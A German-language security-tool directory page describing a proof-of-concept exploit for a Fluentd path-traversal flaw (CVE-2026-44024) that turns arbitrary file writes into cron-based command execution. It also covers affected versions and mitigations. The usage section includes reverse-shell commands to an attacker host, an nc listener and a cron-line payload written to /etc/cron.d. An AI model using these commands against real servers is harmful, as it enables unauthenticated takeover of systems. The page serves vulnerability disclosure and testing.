Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-44024_exploit — Proof-of-concept-Exploit für CVE-2026-44024, der mithilfe eines manipulierten in_forward-Tags beliebige Dateien über die Path-Traversal-Schwachstelle des out_file-Plugins von Fluentd schreibt und die Ausführung von Befehlen auslöst. | Kitploit
Tools/GitHubGitHub/0xdak/cve-2026-44024_exploit
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsRed Teaming
GitHub0xdak/cve-2026-44024_exploit

CVE-2026-44024_exploit

Proof-of-concept-Exploit für CVE-2026-44024, der mithilfe eines manipulierten in_forward-Tags beliebige Dateien über die Path-Traversal-Schwachstelle des out_file-Plugins von Fluentd schreibt und die Ausführung von Befehlen auslöst.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 16 TagenNoch nicht geprüft

CVE-2026-44024 — Pfad-Traversal-Arbitrary-File-Write im out_file-Plugin von Fluentd über ${tag}

Authentifizierungsfreies beliebiges Dateischreiben im out_file-Plugin von Fluentd über den Platzhalter ${tag}.

out_file ermöglicht es Betreibern, den Ausgabepfad mit einem ${tag}-Platzhalter zu templaten (z. B. path /var/log/fluent/${tag}). Output#extract_placeholders (lib/fluent/plugin/output.rb) setzt das Tag des Events in den Pfad ein, ohne ../ zu bereinigen (CWE-22):

root@kitploit:~
if str.include?('${tag}')
  rvalue = rvalue.gsub('${tag}', metadata.tag)   # Angreifer-kontrolliertes Tag, keine ../-Prüfung

Events, die über das in_forward-Protokoll (Port 24224) eintreffen, tragen ein Tag, das wortwörtlich aus der Wire-Message übernommen wird, und allow_anonymous_source ist standardmäßig auf true gesetzt, sodass ein nicht authentifizierter Angreifer ein Tag wie ../../../../../../etc/cron.d/pwn setzen kann, um das konfigurierte Verzeichnis zu verlassen und als Benutzer des Fluentd-Prozesses eine beliebige absolute Datei zu schreiben.

  • Betroffen: Fluentd <= 1.19.2
  • Behoben: 1.19.3 (lehnt ..//absolute Komponenten im Tag ab, bevor ${tag} expandiert wird, PR #5391)
  • CWE: 22 (Path Traversal) / 94 (Code Injection über den geschriebenen Inhalt)
  • Ports: 24224 (forward — der Vektor), 9880 (http)
  • Auswirkung: beliebiges Dateischreiben als Fluentd-Benutzer → RCE (z. B. eine Root-Cron-Zeile)

Wichtig — der Vektor ist in_forward, nicht in_http

in_http leitet das Tag aus dem URL-Pfad mit path.split('/').join('.') ab, was jedes / in . verwandelt — ../ kann auf Linux also nicht überleben (und %2f wird nicht dekodiert). Nur das forward-Protokoll (24224) übergibt das Tag byte-für-byte. Dieser Exploit spricht gerade genug von diesem Protokoll (eine msgpack-[tag, time, record]-Nachricht) mit einem winzigen eingebauten Encoder — keine Abhängigkeiten.

Anforderungen

Nur die Python-3-Standardbibliothek. Das Ziel muss ein verwundbares Fluentd mit einem out_file ausführen, dessen path ${tag} enthält, sowie eine anonyme in_forward-Quelle (Standard). Um das Schreiben in einen sauberen Cron-Drop zu verwandeln, wird ein out_file benötigt, das Dateinamen/Inhalt nicht verändert (z. B. add_path_suffix false, append true, kein Timekey, single_value-Format) — andernfalls kann das Dateischreiben verwendet werden, um eine Datei mit bekanntem Pfad zu überschreiben.

Verwendung

root@kitploit:~
# Reverse Shell (zuerst Listener starten: nc -lvnp 4444). Wird über Cron innerhalb von ~60s ausgelöst.
python3 exploit.py 10.10.10.10 --shell 10.10.14.5:4444

# Blind Command als Root
python3 exploit.py 10.10.10.10 -c 'id > /tmp/pwned'

# Benutzerdefinierter Forward-Port
python3 exploit.py 10.10.10.10:24224 --shell 10.10.14.5:4444

Wie es funktioniert

Sendet ein Forward-Event ["../../../../../../etc/cron.d/pwn", <time>, {"msg": "* * * * * root <cmd>"}] an Port 24224. out_file expandiert ${tag} → /var/log/fluent/../../../../../../etc/cron.d/pwn = /etc/cron.d/pwn und schreibt (mit einem single_value-Format) die msg des Records wortwörtlich → eine gültige Cron-Zeile. Cron führt sie innerhalb von ~60 s als Fluentd-Benutzer aus (root, wenn Fluentd als root läuft).

Abhilfe

Fluentd auf ≥ 1.19.3 aktualisieren; den Forward-Port nicht ungeschützten Netzwerken aussetzen (Shared-Key-Auth aktivieren / allow_anonymous_source false); Fluentd nicht als root ausführen; ${tag} in Ausgabepfaden für nicht vertrauenswürdige Eingaben vermeiden.

Haftungsausschluss

Nur für autorisierte Sicherheitstests und zu Bildungszwecken. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben.

Tool herunterladen